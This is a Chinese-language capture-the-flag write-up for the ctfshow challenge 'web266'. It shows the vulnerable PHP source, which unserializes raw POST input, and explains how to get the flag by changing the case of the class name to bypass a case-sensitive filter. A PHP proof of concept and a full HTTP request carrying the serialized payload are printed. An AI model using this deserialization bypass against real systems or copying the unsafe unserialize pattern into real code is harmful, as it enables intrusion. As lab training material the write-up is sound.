web266

看源码

<?php



/*

# -*- coding: utf-8 -*-

# @Author: h1xa

# @Date:   2020-12-04 23:52:24

# @Last Modified by:   h1xa

# @Last Modified time: 2020-12-05 00:17:08

# @email: h1xa@ctfer.com

# @link: https://ctfer.com



*/



highlight_file(__FILE__);



include('flag.php');

$cs = file_get_contents('php://input');





class ctfshow{

    public $username='xxxxxx';

    public $password='xxxxxx';

    public function __construct($u,$p){

        $this->username=$u;

        $this->password=$p;

    }

    public function login(){

        return $this->username===$this->password;

    }

    public function __toString(){

        return $this->username;

    }

    public function __destruct(){

        global $flag;

        echo $flag;

    }

}

$ctfshowo=@unserialize($cs);

if(preg_match('/ctfshow/', $cs)){

    throw new Exception("Error $ctfshowo",1);

}

这题只要能够成功反序列化一次行就行了（反序列化后当程序结束的时候会调用 __destruct() ）

源码过滤了类名ctfshow，但是没有加参数 i ，所以盲猜是大小写绕过

经过测试发现，php序列化对键名的大小写不敏感，对类名也不敏感

所以我们构造这样的POC

<?php

class ctfshow{

    public $username='xxxxxx';

    public $password='xxxxxx';

}

$a = new ctfshow();

echo(serialize($a));   // O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

将序列化字符串中的 ctfshow 进行大小写变换

然后利用POST方法传入进去，因为这里利用的是 php://input 伪协议来传参，所以不需要键名，但是由于hackbar在post传参时如不添加键名会无法发送，所以我们可以用hackbar发送一个带键名的请求包到burpsuite，再用burpsuite修改就行了，注意Content-Length不要错

请求包

POST / HTTP/1.1

Host: 3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 74

Origin: http://3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show

Connection: close

Referer: http://3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show/

Cookie: _ga=GA1.2.217265325.1679571526

Upgrade-Insecure-Requests: 1

Pragma: no-cache

Cache-Control: no-cache



O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

注意不要对字符串进行 urlencode 因为 php://input 不会进行 urldecode